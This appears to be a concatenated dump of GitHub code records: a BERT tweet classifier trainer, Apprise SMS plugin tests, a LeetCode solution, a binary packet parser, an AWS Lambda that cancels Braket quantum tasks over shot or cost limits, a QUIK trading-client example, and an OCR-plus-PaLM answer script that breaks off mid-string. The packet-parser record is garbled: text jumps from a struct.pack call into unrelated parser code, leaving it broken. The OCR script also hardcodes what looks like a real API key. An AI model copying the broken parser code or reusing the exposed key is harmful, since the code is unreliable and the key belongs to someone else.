TEXT),('label', LABEL)]\n \n def __init__(self):\n self.owner = 'xinhuan'\n \n def get_data(self,index):\n train_data,test_data = get_traindata(self.fields,index)\n print(tokenizer.convert_ids_to_tokens(vars(train_data.examples[6])['text']))\n train_data, valid_data = train_data.split(random_state = random.seed(self.SEED))\n device = torch.device('cpu')\n train_iterator, valid_iterator, test_iterator = data.BucketIterator.splits(\n (train_data, valid_data, test_data), \n sort = False,\n batch_size = BATCH_SIZE, \n device = device\n )\n self.LABEL.build_vocab(train_data)\n self.LABEL.vocab.stoi =defaultdict(None, {'0': 0, '1': 1})\n print(self.LABEL.vocab.stoi)\n return train_iterator, valid_iterator, test_iterator\n \n def get_final_data(self):\n train_data = final_data(self.fields)\n print(tokenizer.convert_ids_to_tokens(vars(train_data.examples[6])['text']))\n train_data, valid_data = train_data.split(random_state = random.seed(self.SEED))\n train_iterator, valid_iterator = data.BucketIterator.splits(\n (train_data, valid_data), \n sort = False,\n batch_size = BATCH_SIZE, \n device = device\n )\n self.LABEL.build_vocab(train_data)\n self.LABEL.vocab.stoi =defaultdict(None, {'0': 0, '1': 1})\n print(self.LABEL.vocab.stoi)\n return train_iterator, valid_iterator\n \n \n def train_model(self, model,i):\n train_iterator, valid_iterator, test_iterator = self.get_data(i)\n N_EPOCHS = 5\n\n best_valid_loss = float('inf')\n\n for epoch in range(N_EPOCHS):\n\n start_time = time.time()\n\n train_loss, train_acc = train(model, train_iterator, optimizer, criterion)\n valid_loss, valid_acc = evaluate(model, valid_iterator, criterion)\n \n end_time = time.time()\n \n epoch_mins, epoch_secs = epoch_time(start_time, end_time)\n \n if valid_loss < best_valid_loss:\n best_valid_loss = valid_loss\n torch.save(model.state_dict(), 'tut6-model.pt')\n print(f'Epoch: {epoch+1:02} | Epoch Time: {epoch_mins}m {epoch_secs}s')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train Acc: {train_acc*100:.2f}%')\n print(f'\\t Val. Loss: {valid_loss:.3f} | Val. Acc: {valid_acc*100:.2f}%')\n \n model.load_state_dict(torch.load('tut6-model.pt'))\n test_loss, test_acc = evaluate(model, test_iterator, criterion)\n print(f'Test Loss: {test_loss:.3f} | Test Acc: {test_acc*100:.2f}%')\n \n def train_final_model(self, model):\n train_iterator, valid_iterator = self.get_final_data()\n N_EPOCHS = 5\n\n best_valid_loss = float('inf')\n\n for epoch in range(N_EPOCHS):\n\n start_time = time.time()\n\n train_loss, train_acc = train(model, train_iterator, optimizer, criterion)\n valid_loss, valid_acc = evaluate(model, valid_iterator, criterion)\n \n end_time = time.time()\n \n epoch_mins, epoch_secs = epoch_time(start_time, end_time)\n \n if valid_loss < best_valid_loss:\n best_valid_loss = valid_loss\n torch.save(model.state_dict(), 'final-model.pt')\n print(f'Epoch: {epoch+1:02} | Epoch Time: {epoch_mins}m {epoch_secs}s')\n print(f'\\tTrain Loss: {train_loss:.3f} | Train Acc: {train_acc*100:.2f}%')\n print(f'\\t Val. Loss: {valid_loss:.3f} | Val. Acc: {valid_acc*100:.2f}%')\n \n \n def predict_sentiment(self,model, tokenizer, sentence):\n model.eval()\n tokens = tokenizer.tokenize(sentence)\n tokens = tokens[:max_input_length-2]\n indexed = [init_token_idx] + tokenizer.convert_tokens_to_ids(tokens) + [eos_token_idx]\n tensor = torch.LongTensor(indexed).to(device)\n tensor = tensor.unsqueeze(0)\n prediction = torch.sigmoid(model(tensor))\n return prediction.item() \n \n \n \n \nif __name__ == \"__main__\":\n \n \n model = BERTModel(bert,\n HIDDEN_DIM,\n OUTPUT_DIM,\n N_LAYERS,\n BIDIRECTIONAL,\n DROPOUT)\n optimizer = optim.Adam(model.parameters())\n criterion = nn.BCEWithLogitsLoss()\n \n model = model.to(device)\n \n criterion = criterion.to(device)\n #test_file = path +filename\n model_trainer=Model_trainer()\n model_trainer.train_final_model(model)\n # dataframe = pd.read_csv(test_file) \n # data_list = dataframe['twitters'].values.tolist()\n # model.load_state_dict(torch.load('tut6-model.pt'))\n # fake_score_list = []\n # for sentence in data_list:\n # fake_score = model_trainer.predict_sentiment(model,tokenizer,sentence)\n # fake_score_list.append(fake_score)\n # dataframe[\"fake_score\"] = fake_score_list\n # dataframe.to_csv(\"text_classification/data/results/%d.csv\" %i, index = False) \n \n \n \n \n \n \n \n\n\n\n \n","repo_name":"damiano/pan2020-rmit","sub_path":"modelTrainer.py","file_name":"modelTrainer.py","file_ext":"py","file_size_in_byte":6856,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"26746934014","text":"from typing import Callable, Optional\nimport apache_beam as beam\nfrom apache_beam.options.pipeline_options import PipelineOptions\n\n\ndef run(\n input_text: str,\n beam_options: Optional[PipelineOptions] = None,\n test: Callable[[beam.PCollection], None] = lambda _: None,\n) -> None:\n with beam.Pipeline(options=beam_options) as pipeline:\n elements = (\n pipeline\n | \"Create elements\" >> beam.Create([\"Hello\", \"World!\", input_text])\n | \"Print elements\" >> beam.Map(print)\n )\n\n # Used for testing only.\n test(elements)\n","repo_name":"vicenteg/cookiecutter-apache-beam","sub_path":"beam-python/{{cookiecutter.project_slug}}/{{cookiecutter.pipeline_module}}/{{cookiecutter.pipeline_main_class}}.py","file_name":"{{cookiecutter.pipeline_main_class}}.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15224652667","text":"import requests\nfrom json import loads\nfrom unittest import mock\nfrom apprise.plugins.NotifyD7Networks import NotifyD7Networks\nfrom helpers import AppriseURLTester\nfrom apprise import Apprise\nfrom apprise import NotifyType\n\n# Disable logging for a cleaner testing output\nimport logging\nlogging.disable(logging.CRITICAL)\n\n# Our Testing URLs\napprise_url_tests = (\n ('d7sms://', {\n # We failed to identify any valid authentication\n 'instance': TypeError,\n }),\n ('d7sms://:@/', {\n # We failed to identify any valid authentication\n 'instance': TypeError,\n }),\n ('d7sms://token@{}/{}/{}'.format('1' * 9, '2' * 15, 'a' * 13), {\n # No valid targets to notify\n 'instance': NotifyD7Networks,\n # Since there are no targets specified we expect a False return on\n # send()\n 'notify_response': False,\n }),\n ('d7sms://token1@{}?batch=yes'.format('3' * 14), {\n # valid number\n 'instance': NotifyD7Networks,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'd7sms://t...1@',\n }),\n ('d7sms://token:colon2@{}?batch=yes'.format('3' * 14), {\n # valid number - token containing a colon\n 'instance': NotifyD7Networks,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'd7sms://t...2@',\n }),\n ('d7sms://:token3@{}?batch=yes'.format('3' * 14), {\n # valid number - token starting wit a colon\n 'instance': NotifyD7Networks,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'd7sms://:...3@',\n }),\n ('d7sms://{}?token=token6'.format('3' * 14), {\n # valid number - token starting wit a colon\n 'instance': NotifyD7Networks,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'd7sms://t...6@',\n }),\n ('d7sms://token4@{}?unicode=no'.format('3' * 14), {\n # valid number - test unicode\n 'instance': NotifyD7Networks,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'd7sms://t...4@',\n }),\n ('d7sms://token8@{}/{}/?unicode=yes'.format('3' * 14, '4' * 14), {\n # valid number - test unicode\n 'instance': NotifyD7Networks,\n # Our expected url(privacy=True) startswith() response:\n 'privacy_url': 'd7sms://t...8@',\n }),\n ('d7sms://token@{}?batch=yes&to={}'.format('3' * 14, '6' * 14), {\n # valid number\n 'instance': NotifyD7Networks,\n }),\n ('d7sms://token@{}?batch=yes&from=apprise'.format('3' * 14), {\n # valid number, utilizing the optional from= variable\n 'instance': NotifyD7Networks,\n }),\n ('d7sms://token@{}?batch=yes&source=apprise'.format('3' * 14), {\n # valid number, utilizing the optional source= variable (same as from)\n 'instance': NotifyD7Networks,\n }),\n ('d7sms://token@{}?batch=no'.format('3' * 14), {\n # valid number - no batch\n 'instance': NotifyD7Networks,\n }),\n ('d7sms://token@{}'.format('3' * 14), {\n 'instance': NotifyD7Networks,\n # throw a bizzare code forcing us to fail to look it up\n 'response': False,\n 'requests_response_code': 999,\n }),\n ('d7sms://token@{}'.format('3' * 14), {\n 'instance': NotifyD7Networks,\n # Throws a series of connection and transfer exceptions when this flag\n # is set and tests that we gracfully handle them\n 'test_requests_exceptions': True,\n }),\n)\n\n\ndef test_plugin_d7networks_urls():\n \"\"\"\n NotifyD7Networks() Apprise URLs\n\n \"\"\"\n\n # Run our general tests\n AppriseURLTester(tests=apprise_url_tests).run_all()\n\n\n@mock.patch('requests.post')\ndef test_plugin_d7networks_edge_cases(mock_post):\n \"\"\"\n NotifyD7Networks() Edge Cases tests\n\n \"\"\"\n\n # Prepare Mock\n request = mock.Mock()\n request.content = '{}'\n request.status_code = requests.codes.ok\n mock_post.return_value = request\n\n # Initializations\n aobj = Apprise()\n assert aobj.add('d7sms://Token@15551231234/15551231236')\n\n body = \"test message\"\n\n # Send our notification\n assert aobj.notify(\n body=body, title='title', notify_type=NotifyType.INFO)\n\n # Not set to batch, so we send 2 different messages\n assert mock_post.call_count == 2\n assert mock_post.call_args_list[0][0][0] == \\\n 'https://api.d7networks.com/messages/v1/send'\n assert mock_post.call_args_list[1][0][0] == \\\n 'https://api.d7networks.com/messages/v1/send'\n\n # our first post\n data = loads(mock_post.call_args_list[0][1]['data'])\n assert len(data['messages']) == 1\n message = data['messages'][0]\n assert len(message['recipients']) == 1\n assert message['content'] == 'title\\r\\ntest message'\n assert message['data_coding'] == 'auto'\n\n # our second post\n data = loads(mock_post.call_args_list[1][1]['data'])\n assert len(data['messages']) == 1\n message = data['messages'][0]\n assert len(message['recipients']) == 1\n assert message['content'] == 'title\\r\\ntest message'\n assert message['data_coding'] == 'auto'\n\n #\n # Do a batch test now\n #\n\n mock_post.reset_mock()\n\n # Initializations\n aobj = Apprise()\n assert aobj.add('d7sms://Token@15551231234/15551231236?batch=yes')\n\n body = \"test message\"\n\n # Send our notification\n assert aobj.notify(\n body=body, title='title', notify_type=NotifyType.INFO)\n\n # All notifications go through in a batch\n assert mock_post.call_count == 1\n assert mock_post.call_args_list[0][0][0] == \\\n 'https://api.d7networks.com/messages/v1/send'\n\n data = loads(mock_post.call_args_list[0][1]['data'])\n assert len(data['messages']) == 1\n message = data['messages'][0]\n # All of our phone numbers were added here\n assert len(message['recipients']) == 2\n assert '15551231234' in message['recipients']\n assert '15551231236' in message['recipients']\n assert message['content'] == 'title\\r\\ntest message'\n assert message['data_coding'] == 'auto'\n","repo_name":"caronc/apprise","sub_path":"test/test_plugin_d7networks.py","file_name":"test_plugin_d7networks.py","file_ext":"py","file_size_in_byte":6055,"program_lang":"python","lang":"en","doc_type":"code","stars":8936,"dataset":"github-code","pt":"21"} +{"seq_id":"13367713211","text":"# -*- coding: utf-8 -*-\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport logging\nfrom typing import Callable, Iterator, NewType\n\nfrom ratelimit import limits, sleep_and_retry\n\nfrom bugbug import db\nfrom bugbug.utils import get_secret, get_session\n\nlogger = logging.getLogger(__name__)\n\nIssueDict = NewType(\"IssueDict\", dict)\n\nDB_VERSION = 1\nDB_URL = \"https://community-tc.services.mozilla.com/api/index/v1/task/project.bugbug.data_github_{}_{}_issues.latest/artifacts/public/github_{}_{}_issues.json.zst\"\n\nPER_PAGE = 100\n# Rate limit period in seconds\nRATE_LIMIT_PERIOD = 900\n\n\nclass Github:\n def __init__(\n self, owner: str, repo: str, state: str = \"all\", retrieve_events: bool = False\n ) -> None:\n self.owner = owner\n self.repo = repo\n self.state = state\n self.retrieve_events = retrieve_events\n\n self.db_path = \"data/github_{}_{}_issues.json\".format(self.owner, self.repo)\n\n if not db.is_registered(self.db_path):\n db.register(\n self.db_path,\n DB_URL.format(self.owner, self.repo, self.owner, self.repo),\n DB_VERSION,\n )\n\n def get_issues(self) -> Iterator[IssueDict]:\n yield from db.read(self.db_path)\n\n def delete_issues(self, match: Callable[[IssueDict], bool]) -> None:\n db.delete(self.db_path, match)\n\n @sleep_and_retry\n @limits(calls=1200, period=RATE_LIMIT_PERIOD)\n def api_limit(self):\n # Allow a limited number of requests to account for rate limiting\n pass\n\n def get_token(self) -> str:\n return get_secret(\"GITHUB_TOKEN\")\n\n def fetch_events(self, events_url: str) -> list:\n self.api_limit()\n logger.info(\"Fetching %s\", events_url)\n headers = {\"Authorization\": \"token {}\".format(self.get_token())}\n response = get_session(\"github\").get(events_url, headers=headers)\n response.raise_for_status()\n events_raw = response.json()\n return events_raw\n\n def fetch_issues(\n self, url: str, retrieve_events: bool, params: dict | None = None\n ) -> tuple[list[IssueDict], dict]:\n self.api_limit()\n headers = {\"Authorization\": \"token {}\".format(self.get_token())}\n response = get_session(\"github\").get(url, params=params, headers=headers)\n response.raise_for_status()\n data = response.json()\n\n # If only one issue is requested, add it to a list\n if isinstance(data, dict):\n data = [data]\n\n logger.info(\"Fetching %s\", url)\n\n if retrieve_events:\n for item in data:\n events = self.fetch_events(item[\"events_url\"])\n item.update({\"events\": events})\n\n return data, response.links\n\n def get_start_page(self) -> int:\n # Determine next page to fetch based on number of downloaded issues\n issues = self.get_issues()\n count = sum(1 for _ in issues)\n return int(count / PER_PAGE) + 1\n\n def fetch_issues_updated_since_timestamp(self, since: str) -> list[IssueDict]:\n # Fetches changed and new issues since a specified timestamp\n url = \"https://api.github.com/repos/{}/{}/issues\".format(self.owner, self.repo)\n\n params = {\"state\": self.state, \"since\": since, \"per_page\": PER_PAGE, \"page\": 1}\n\n data, response_links = self.fetch_issues(\n url=url, retrieve_events=self.retrieve_events, params=params\n )\n\n # Fetch next page\n while \"next\" in response_links.keys():\n next_page_data, response_links = self.fetch_issues(\n response_links[\"next\"][\"url\"], self.retrieve_events\n )\n data += next_page_data\n\n logger.info(\"Done fetching updates\")\n\n return data\n\n def download_issues(self) -> None:\n # Fetches all issues sorted by date of creation in ascending order\n url = \"https://api.github.com/repos/{}/{}/issues\".format(self.owner, self.repo)\n start_page = self.get_start_page()\n\n params = {\n \"state\": self.state,\n \"sort\": \"created\",\n \"direction\": \"asc\",\n \"per_page\": PER_PAGE,\n \"page\": start_page,\n }\n\n data, response_links = self.fetch_issues(\n url=url, retrieve_events=self.retrieve_events, params=params\n )\n\n db.append(self.db_path, data)\n # Fetch next page\n while \"next\" in response_links.keys():\n next_page_data, response_links = self.fetch_issues(\n response_links[\"next\"][\"url\"], self.retrieve_events\n )\n db.append(self.db_path, next_page_data)\n\n logger.info(\"Done downloading\")\n\n def fetch_issue_by_number(\n self, owner: str, repo: str, issue_number: int, retrieve_events: bool = False\n ) -> IssueDict:\n # Fetches an issue by id\n url = \"https://api.github.com/repos/{}/{}/issues/{}\".format(\n owner, repo, issue_number\n )\n\n data = self.fetch_issues(url=url, retrieve_events=retrieve_events)\n\n return data[0][0]\n","repo_name":"mozilla/bugbug","sub_path":"bugbug/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","stars":469,"dataset":"github-code","pt":"21"} +{"seq_id":"12198330036","text":"# Input: nums = [2,7,11,15], target = 9\r\n# Output: [0,1]\r\n\r\nnums = [2,7,11,15]\r\ntarget = 9\r\n# nums = [3,2,4] \r\n# target = 6\r\n\r\ndef twoSum(nums, target):\r\n for index, val in enumerate(nums):\r\n x = target - val\r\n \r\n nums[index] = None\r\n \r\n if x in nums:\r\n return [index, nums.index(x)]\r\n\r\nx=twoSum(nums,target)\r\nprint(x)\r\n\r\n","repo_name":"Mirzo001/LeetCodeReview","sub_path":"1. Two Sum.py","file_name":"1. Two Sum.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"31774745856","text":"import struct\nimport binascii\n\nclass Packet(object):\n\n def __init__(self, *args, **kwargs):\n if 'ver' in kwargs:\n self.ver = kwargs['ver']\n if 'flags' in kwargs:\n self.flags = kwargs['flags']\n if 'proto' in kwargs:\n self.proto = kwargs['proto']\n if 'dst_addr' in kwargs:\n self.dst_addr = kwargs['dst_addr']\n if 'src_addr' in kwargs:\n self.src_addr = kwargs['src_addr']\n self.length = 16\n self.option = 0\n self.ot_len = 0\n if 'option_list' in kwargs and kwargs['option_list'] != None:\n self.option = 1\n self.option_list = kwargs['option_list']\n self.ot_len = len(self.option_list) + 2\n self.length = self.length + self.ot_len\n if 'data' in kwargs:\n self.data = kwargs['data']\n self.length = self.length + len(self.data)\n\n def dumps(self):\n b = bytearray()\n #header = self.flags | (self.ver << 6) | (self.option << 5)\n header = self.ver | self.option << 2 | self.flags << 3\n b.extend(struct.pack('>B', header))\n b.extend(struct.pack('>B', self.proto))\n b.extend(struct.pack('> 2\n self.packet.flags = self.packet.header >> 3\n elif self.waiting == PacketEnum.WAITING_PROTO:\n done = self.feed(byte, PacketEnum.WAITING_LEN, None)\n if done:\n value = self.field()\n self.packet.proto = value[0]\n elif self.waiting == PacketEnum.WAITING_LEN:\n done = self.feed(byte, PacketEnum.WAITING_DST_ADDR, None)\n if done:\n f = self.field()\n self.packet.length, = struct.unpack_from(' dict:\n \"\"\"Cancel all QUEUED tasks if total shots or cost is over the max value and send result message to the email.\n\n Args:\n event (_type_): event\n context (_type_): context\n\n Returns:\n (str): json-format string\n \"\"\"\n # 定数設定\n SLACK_POST_URL = os.environ[\"SLACK_POST_URL\"]\n TOPIC_ARN = os.environ[\"TOPIC_ARN\"]\n MAX_SHOT_NUM = int(os.environ[\"MAX_SHOT_NUM\"])\n MAX_SHOT_COST = int(os.environ[\"MAX_SHOT_COST\"]) # dollar\n\n logger.info(event)\n\n # set boto user\n ama_us_west_1 = AmazonBraketlib(\"us-west-1\")\n ama_us_west_2 = AmazonBraketlib(\"us-west-2\")\n ama_us_east_1 = AmazonBraketlib(\"us-east-1\")\n clients: list = [ama_us_west_1, ama_us_west_2, ama_us_east_1]\n\n # device definition\n device_table: dict[str, list[str]] = settings.DEVICE_TABLE\n device_region_index_dict: dict[str, int] = settings.DEVICE_REGION_INDEX_DICT\n\n # setting device of Tasks that have now changed the status\n device_provider: str\n device_name: str\n is_known_device: bool\n (device_provider, device_name, is_known_device) = set_device_info(\n device_table, event\n )\n if is_known_device is False:\n post_slack(\"error: unknown_device\", SLACK_POST_URL, event)\n return {\"error\": \"unknown device\"}\n\n # store task results for each status to result dictionary\n shots_count_each_status: list[int] = [0, 0, 0]\n task_count_each_status: list[int] = [0, 0, 0]\n task_info_each_status: list = []\n result: dict = {}\n deviceArn: str = event[\"detail\"][\"deviceArn\"]\n (\n shots_count_each_status,\n task_count_each_status,\n task_info_each_status,\n result,\n ) = set_task_results(\n shots_count_each_status,\n task_count_each_status,\n task_info_each_status,\n clients,\n device_region_index_dict,\n device_provider,\n deviceArn,\n )\n\n # set output json string values\n lambda_output: dict = {}\n lambda_output = set_lambda_output(\n lambda_output, result, shots_count_each_status, task_count_each_status\n )\n\n deleted_result: list = delete_task_over_max_shot(\n MAX_SHOT_NUM,\n clients,\n device_region_index_dict,\n device_provider,\n shots_count_each_status,\n task_info_each_status,\n )\n\n deleted_result2: list = delete_task_over_max_cost(\n MAX_SHOT_COST,\n clients,\n device_region_index_dict,\n device_provider,\n shots_count_each_status,\n task_info_each_status,\n task_count_each_status,\n )\n\n send_email(lambda_output, TOPIC_ARN)\n post_slack(lambda_output, SLACK_POST_URL, event)\n\n return lambda_output\n\n\ndef set_task_results(\n shots_count_each_status: list[int],\n task_count_each_status: list[int],\n task_info_each_status: list,\n clients: list,\n device_region_index_dict: dict,\n device_provider: str,\n deviceArn: str,\n) -> tuple[list[int], list[int], list, dict]:\n # store task results for each status to result dictionary\n\n result: dict = {}\n today_date = [date.today().year, date.today().month, date.today().day]\n\n for task_status_index in range(3):\n result = clients[device_region_index_dict[device_provider]].get_info(\n *today_date, deviceArn, task_status_index\n )\n task_info_each_status.append(result)\n\n shots_count_each_status[task_status_index] += result[\"total_shots\"]\n\n if result[\"total_shots\"]:\n for id_name in result[\"id\"].keys():\n if \"/\" not in id_name:\n task_count_each_status[task_status_index] += len(\n result[\"id\"][id_name]\n )\n return (\n shots_count_each_status,\n task_count_each_status,\n task_info_each_status,\n result,\n )\n\n\ndef set_device_info(device_table: dict[str, list[str]], event) -> tuple[str, str, bool]:\n # setting device of Tasks that have now changed the status\n # for each device_table keys\n for device_provider in device_table.keys():\n # for each device_table values\n for device_name in device_table[device_provider]:\n if device_name in event[\"detail\"][\"deviceArn\"]:\n return (device_provider, device_name, True)\n return (\"\", \"\", False)\n\n\ndef set_lambda_output(\n lambda_output: dict,\n result: dict,\n shots_count_each_status: list[int],\n task_count_each_status: list[int],\n) -> dict:\n # set lambda_output in json string type\n lambda_output[\"date\"] = result[\"date\"]\n lambda_output[\"qpu\"] = result[\"qpu\"]\n lambda_output[\"QUEUED_shot_count\"] = shots_count_each_status[0]\n lambda_output[\"QUEUED_task_conut\"] = task_count_each_status[0]\n lambda_output[\"COMPLETED_shot_count\"] = shots_count_each_status[1]\n lambda_output[\"COMPLETED_task_count\"] = task_count_each_status[1]\n lambda_output[\"CANCELLED_shot_count\"] = shots_count_each_status[2]\n lambda_output[\"CANCELLED_task_count\"] = task_count_each_status[2]\n return lambda_output\n\n\ndef delete_task_over_max_shot(\n max_shot_num: int,\n clients: list,\n device_region_index_dict: dict,\n device_provider: str,\n shots_count_each_status: list[int],\n task_info_each_status: list[dict],\n):\n \"\"\"delete QUEUED task according to the number of shots\n Args:\n max_shot_num :\n clients :\n device_region_index_dict :\n device_name :\n Returns:\n result : TODO 削除したtask_id全て列挙\n \"\"\"\n\n # for debug\n print(\n \"\\r\"\n + str(datetime.now().time())\n + \" QUEUED \"\n + str(shots_count_each_status[0])\n + \" COMPLETED \"\n + str(shots_count_each_status[1])\n + \" CANCELLED \"\n + str(shots_count_each_status[2]),\n end=\"\",\n )\n\n # 現在QUEUEDのshots合計がMAX_SHOT以上なら, 全部のQUEUD taskを削除\n deleted_result = []\n if shots_count_each_status[0] >= max_shot_num:\n for bucket_name in task_info_each_status[0][\"id\"]:\n # bucket_nameにはbucketとそのfolderの両方がtask_idsに代入されるため,\n # '/'があったら飛ばす(folderの中のtaskはとばす)\n if \"/\" not in bucket_name:\n for task_id in task_info_each_status[0][\"id\"][bucket_name]:\n deleted_result.append(\n clients[\n device_region_index_dict[device_provider]\n ].delete_quantumTask(task_id)[\"quantumTaskArn\"]\n )\n return deleted_result\n\n\ndef delete_task_over_max_cost(\n max_cost: int,\n clients: list,\n device_region_index_dict: dict,\n device_provider: str,\n shots_count_each_status: list[int],\n task_info_each_status: list[dict],\n task_count_each_status: list[int],\n):\n \"\"\"Delete QUEUD task accordingly when the maximum cost is exceeded\n Args:\n max_cost :\n clients :\n device_region_index_dict :\n device_provider :\n device_name :\n Returns:\n result : 削除したtask_id 全列挙\n \"\"\"\n price_per_task: float = settings.PRICE_PER_TASK\n price_table: dict = settings.PRICE_TABLE\n price_each_status_index: dict = {\"QUEUED\": 0, \"COMPLETED\": 1, \"CANCELLED\": 2}\n price_each_status: list = [0] * len(price_each_status_index)\n\n # Calculate the total cost of each state\n for price_status in price_each_status_index:\n price_each_status[price_each_status_index[price_status]] = (\n shots_count_each_status[price_each_status_index[price_status]]\n * price_table[device_provider]\n + task_count_each_status[price_each_status_index[price_status]]\n * price_per_task\n )\n\n print(\n \"\\r\"\n + str(datetime.now().time())\n + \" QUEUED \"\n + str(price_each_status[0])\n + \" COMPLETED \"\n + str(price_each_status[1])\n + \" CANCELLED \"\n + str(price_each_status[2]),\n end=\"\",\n )\n\n # 現在QUEUEDのshots合計が50以上なら, 全部のQUEUED taskを削除\n deleted_result = []\n if price_each_status[0] >= max_cost:\n for bucket_name in task_info_each_status[0][\"id\"]:\n # bucket_nameにはbucketとそのfolderの両方がtask_idsに代入されるため,\n # '/'があったら飛ばす(folderの中のtaskはとばす)\n if \"/\" not in bucket_name:\n for task_id in task_info_each_status[0][\"id\"][bucket_name]:\n deleted_result.append(\n clients[\n device_region_index_dict[device_provider]\n ].delete_quantumTask(task_id)[\"quantumTaskArn\"]\n )\n return deleted_result\n\n\ndef send_email(lambda_output, TOPIC_ARN):\n client = boto3.client(\"sns\")\n msg = str(lambda_output)\n subject: str = \"Braket Monitor\"\n client.publish(TopicArn=TOPIC_ARN, Message=msg, Subject=subject)\n\n\ndef post_slack(lambda_output, slack_post_url, event):\n\n # 設定\n method = \"POST\"\n\n # メッセージの内容\n now = datetime.now()\n current_time = now.strftime(\"%Y/%m/%d %H:%M:%S\")\n operation_message = (\n \"*# Task Information*\"\n + \" \"\n + current_time\n + \"\\n\"\n + \"*- triggered event: *\\n\"\n + \"status: \"\n + str(event[\"detail\"][\"status\"])\n + \", \"\n + \"deviceArn: \"\n + str(event[\"detail\"][\"deviceArn\"])\n + \", \"\n + \"shots: \"\n + str(event[\"detail\"][\"shots\"])\n + \"\\n\"\n )\n\n detail_info = str(lambda_output)\n\n message = (\n operation_message\n + \"\\n\"\n + \"*- Total task information for a specific device:*\\n\"\n + detail_info\n + \"\\n\"\n )\n send_data = {\n \"blocks\": [\n {\n \"type\": \"section\",\n \"text\": {\n \"type\": \"mrkdwn\",\n \"text\": message,\n },\n }\n ],\n }\n\n send_text = (\"payload=\" + json.dumps(send_data)).encode(\"utf-8\")\n\n request = urllib.request.Request(slack_post_url, data=send_text, method=method)\n with urllib.request.urlopen(request) as response:\n response_body = response.read().decode(\"utf-8\")\n\n return response_body\n","repo_name":"Qulacs-Osaka/Amazon_Braket_Monitoring_Tools","sub_path":"src/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":10634,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"32764133230","text":"import asyncio\nfrom aioquiklua import QuikLuaClientBase, QuikLuaException, QuikLuaConnectionException, QuikLuaNoHistoryException\nimport traceback\nimport time\n\n\nasync def main():\n \"\"\"\n Пример кода для получения параметров\n \"\"\"\n\n qclient = QuikLuaClientBase(\"tcp://localhost:5560\", # RPC сокет\n None, # PUB сокет\n socket_timeout=100, # Таймаут сокета после которого он выдает ошибку (в миллисекундах)\n n_simultaneous_sockets=5, # Количество одновременно открытых сокетов\n history_backfill_interval_sec=10, # Таймаут на ожидание истории (в секундах) (обычно занимает менее 1 сек)\n cache_min_update_sec=0.2, # Время актуальности истории котировок к кеше, после последнего обновления\n verbosity=3, # Включаем debugging information (чем выше значение тем больше идет в лог)\n # logger=logging.getLogger('testlog') # Можно задать кастомный логгер\n )\n\n try:\n # Вызываем initialize() основного класса для инициализации внутренних переменных\n await qclient.initialize()\n\n # Просто проверяем коннект\n await qclient.heartbeat()\n\n # Пробуем наблюдать за текущими параметрами всех фьючерсов ФОРТС\n all_classes = await qclient.rpc_call('getClassSecurities', class_code='SPBFUT')\n all_securities = all_classes['class_securities'].split(',')\n\n #\n # Ключи параметров могут быть в любом регистре, но потом все ключи параметров конвертируются в lower case\n #\n for _sec_code in all_securities:\n if _sec_code:\n await qclient.params_subscribe('SPBFUT',\n _sec_code,\n [0.5, 0.5, 0.5, 10, 1, 10], # Можно задать интервал обновления отдельно для каждого параметра в сек\n ['bid', 'offer', 'last', 'MAT_DATE', 'time', 'STEPPRICET'])\n\n print(f'Press ctrl+c to stop')\n while True:\n # Нажмите ctrl+c чтобы завершить\n #\n # В течение рабочего времени торговой сессии значения параметров должны обновляться\n #\n\n params = qclient.params_get('SPBFUT', 'RIH1')\n # Обратите внимание все ключи параметров конвертируются в lower case\n print(f\"Params 'SPBFUT', 'RIH1': {params}\")\n\n # heartbeat() - также проверяет если таск обновления параметров выдал какой-нибудь exception\n # его полезно запускать периодически но не очень часто, 5-10 секунд самое то\n await qclient.heartbeat()\n\n await asyncio.sleep(5)\n except asyncio.CancelledError:\n # AsyncIO valid stop\n raise\n except KeyboardInterrupt:\n print('KeyboardInterrupt')\n except:\n print(traceback.format_exc())\n finally:\n # Завершаем выполнение (ОБЯЗАТЕЛЬНО вызывайте shutdown() особенно если вы заказывали историю котировок!)\n await qclient.shutdown()\n\n\nif __name__ == '__main__':\n asyncio.run(main())\n","repo_name":"alexveden/quik-lua-async-client-python","sub_path":"examples/sample_params_benchmark.py","file_name":"sample_params_benchmark.py","file_ext":"py","file_size_in_byte":4143,"program_lang":"python","lang":"ru","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"19397950768","text":"import pytesseract\nfrom PIL import Image\nimport google.generativeai as palm\nfrom docx import Document\nfrom docx.enum.text import WD_BREAK\n# import docx2pdf\nimport streamlit as st\nimport time\nimport subprocess\n\ndocx_file = \"QnA_AI.docx\"\npdf_file = \"QnA_AI.pdf\"\nfolder_path = 'img_data/'\n#files_path = \"C:/Users/shaik/OneDrive/Desktop/Pyweek2023/extraprojects/\"\n\n\n\n# def docx_to_pdf(docx_file, pdf_file):\n# cmd = ['libreoffice', '--convert-to', 'pdf', docx_file, '--outdir', pdf_file]\n# subprocess.run(cmd)\n\n\n\ndef perform_ocr(image_path):\n try:\n img = Image.open(image_path)\n text = pytesseract.image_to_string(img)\n return text\n except Exception as e:\n return str(e)\n\n\ndef get_answers(question_text):\n try:\n palm.configure(api_key='AIzaSyDYTiHCkpFbjNB28PKKgCkhi-kpchwv8GA') # Replace with your API key\n\n palm_prompt = \"\"\"\n You are a language model that provides correct and detailed answers to questions with examples in order. Put the question number then mention the question explicitly and then in the next line \"Ans: \" and Answer.\n Output format:\n . \n \n\n sample output:\n 1. What is the name of the capital of India?\n Ans: New 